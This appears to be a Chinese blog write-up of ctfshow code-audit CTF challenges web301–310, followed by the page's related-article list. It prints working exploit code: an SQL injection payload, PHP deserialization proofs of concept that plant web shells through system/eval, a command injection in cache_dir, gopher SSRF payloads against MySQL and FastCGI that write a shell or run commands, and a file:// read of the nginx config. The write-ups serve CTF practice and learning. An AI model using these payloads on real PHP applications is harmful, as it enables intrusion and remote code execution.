ctfshow - 代码审计 入门篇

最新推荐文章于 2024-10-11 16:00:00 发布
最新推荐文章于 2024-10-11 16:00:00 发布
阅读量610 收藏 5
点赞数 9
分类专栏: # WEB 文章标签: 安全 python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/142109815
版权

web301

题目给了附件

在checklogin的时候发现了sql注入 ,但是是延时注入

注入没搞出数据 ,

还有另外一个漏洞 就是抓包 访问 index.php 直接出现flag

有点抽象了 ,看了其他wp说是可以 []=1 数组绕过 ,这个我不太理解

web302

代码还是那个代码

修改的地方

依旧是存在漏洞的

web303

username参数不能大于6

之前的方法都不能绕过了

这里是存在注入点的

但是还是要求登录,没登录会跳转到login

数据库文件有账号密码 这个加密的不是密码

admin是密码 ,用户名也是admin

进来之后使用 dptadd.php接口

dpt_name=1',sds_address=(select flag from sds_fl9g)#

web304

web305

cookie存在反序列化

<?php

  /*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-17 13:20:37
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-17 13:33:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


  class user{
  public $username;
public $password;
public function __construct($u,$p){
  $this->username=$u;
  $this->password=$p;
}
public function __destruct(){
  file_put_contents($this->username, $this->password);
}
}

直接写poc

直接赋值就好了

flag在数据库里面

web306

先看能rce得的点

这里是使用了 file_put_centents函数 ,然后可以写shell 控制 titele 和 info

看什么地方调用了 close

dao.php 里面的 dao类 调用了 close 而且是使用了 __destruct 函数 ,结束的时候会调用这个魔法函数

之后再找反序列化的点

index 可以触发 反序列化

构造poc

<?php
class dao{
	private $conn;

	public function __construct(){
		$this->conn= new log();  //这里是调用 ,new log类 不然 还是触发不了
	}

}
class log{
	public $title='a.php';
	public $info='<?php system($_POST["x"]); ?>';

}

$a = new dao();

echo base64_encode(serialize($a));
echo base64_decode("TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiJhLnBocCI7czo0OiJpbmZvIjtzOjI5OiI8P3BocCBzeXN0ZW0oJF9QT1NUWyJ4Il0pOyA/PiI7fX0=");

看源代码

web307

POC 
<?php

class  config{
    public $cache_dir = ';echo  "<?php eval(\$_POST[1]);?>" >x.php;';
    
}

class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();

echo base64_encode(serialize($a));

web 308

增加了过滤,只能字母,不能出现符号

fun.php 有 curl_exec 这可以造成ssrf

SSRF打MySQL

gopherus生成 poc

构造序列化

<?php
class config{
  public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%47%00%00%00%03%73%65%6c%65%63%74%20%22%e3%80%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%61%2e%70%68%70%22%01%00%00%00%01';
} 

class dao{
  private $config;
  public function __construct(){
    $this->config=new config();
  }
}
$a=new dao();
echo base64_encode(serialize($a));

web309 

<?php
class config{
  public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27tac%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
} 

class dao{
  private $config;
  public function __construct(){
    $this->config=new config();
  }
}
$a=new dao();
echo base64_encode(serialize($a));

web 310

读取nginx配置文件 
<?php
class config{
  public $update_url = 'file:///etc/nginx/nginx.conf';
} 
class dao{
  private $config;
  public function __construct(){
    $this->config=new config();
  }
}
echo base64_encode(serialize(new dao()));

在访问4476

http://127.0.0.1:4476

小龙_(
关注
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctf_show笔记篇(web入门---代码审计
whale_waves的博客
03-13 1316
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow-web41~60-WP
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 274
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
Nullinux:一款针对Linux操作系统的安全检测工具
最新发布
FreeBuf_的博客
10-11 1163
Nullinux是一款针对Linux操作系统的安全检测工具,广大研究人员可以利用该工具针对Linux目标设备执行网络侦查和安全检测。
数据中心物理安全的历史和演变
网络研究观
10-10 876
在当今的数字时代,数据中心托管已成为我们互联世界的支柱。
开发日志:IIS安全配置
老罗传奇
10-09 621
为了解决IIS文件路径泄漏问题,可以采取以下措施: 一. 详细操作 1. CMD关闭NTFS 8.3文件格式的支持 命令行:fsutil 8dot3name set 1 2. 修改注册表禁用短文件名功能 CMD输入regedit回车,在注册表中找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem,将其中的 NtfsDi...
API 数据接口:使用操作流程与安全指南
Noah_ZX的博客
10-07 1036
在当今数字化高速发展的时代,API 数据接口如同构建数字世界的关键纽带,将不同的软件系统和服务紧密连接在一起。无论是企业开发者致力于提升业务效率,还是个人用户追求更便捷的数字体验,深入了解 API 数据接口的使用操作流程以及全力确保其安全性都显得至关重要。
《Web3 安全:攻击与防御全景指南》
sise_2022的博客
10-07 1039
Web3 的出现代表了互联网从中心化向去中心化的过渡,这不仅仅是技术上的升级,更是对现有互联网模式的深刻变革。这一阶段的标志是用户生成内容的爆发、平台经济的兴起,以及互联网巨头的垄断地位。以太坊等区块链平台推动了智能合约和去中心化应用(dApp)的繁荣,去中心化金融(DeFi)、非同质化代币(NFT)以及去中心化自治组织(DAO)等新兴应用正迅速发展,吸引了大量投资和开发者的参与。DAO 的决策过程是公开透明的,参与者可以通过投票等方式直接影响组织的运营,避免了传统组织的集中管理问题。
安全网络架构
qq_56248592的博客
10-10 353
等保等级的确立有助于提升信息系统的安全保护水平,促进网络安全建设和管理的规范化和标准化。通过等保等级的评定和落地,可以有效地引导和推动企事业单位加强信息安全管理,提高对网络安全的关注和重视,确保信息系统的安全运行和数据的保护。等保等级是指我国网络安全等级保护制度中的一种分类标准,用来评估和确定信息系统的安全等级及其相应的安全保护要求。安全培训和意识:网络安全解决方案还包括对员工进行网络安全培训和意识教育,以增强他们对网络安全的认知,并培养正确的安全行为习惯。例如,可以将星型拓扑图和总线型拓扑图组合在一起。
安全性能等级
dhaimo的博客
10-11 613
安全性能等级(PL)是用于规定控制系统安全相关部件在其条件下执行安全功能的离散等级。基本概念性能等级分类评估方法应用领域
钢筋计:实时监测技术优化施工安全
yousino1的博客
10-08 387
在工程调整方面,钢筋计提供的实时监测数据为设计方案调整或施工方案变更提供了科学依据,有助于工程人员做出更加合理的决策。在长期工程项目中,如大型桥梁、高层建筑或深基坑工程,钢筋计能够实时监测结构的变形和应力状态,及时发现潜在的安全隐患,如疲劳裂纹或异常变形。与传统的手工监测方法相比,钢筋计具有显著的优势。想要充分发挥钢筋计的优势,还需要注意:1、确保钢筋计的安装位置准确、合理,以便获取最具代表性的监测数据。钢筋计作为一种监测工具,能够实时测量钢筋混凝土结构中的钢筋应力,从而为施工安全提供了科学依据。
叉车AI行人防撞预警系统,提升作业安全与效率
jiuxin666的博客
10-08 516
叉车AI行人防撞预警系统通过高清摄像头、雷达及深度学习算法,实现高精度环境监测与预警,预防碰撞事故,提升作业安全与效率,成为工业安全与生产提效的重要力量。
T-Box联网安全定义
xxdw1992的博客
10-10 1380
T-Box,即Telematics BOX,也称远程信息处理控制单元(Telematics Control Unit,TCU),是车联网中的重要组成部分。它集成了GPS、外部通信接口、电子处理单元、微控制器、移动通信单元和存储器等功能模块,为车端与车联网的连接提供了入口,并为车机等设备提供上网服务。然而,随着其功能的日益强大和联网特性的存在,T-Box的联网安全问题也日益凸显。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络
鸿蒙的技术博客
10-10 486
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程中去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值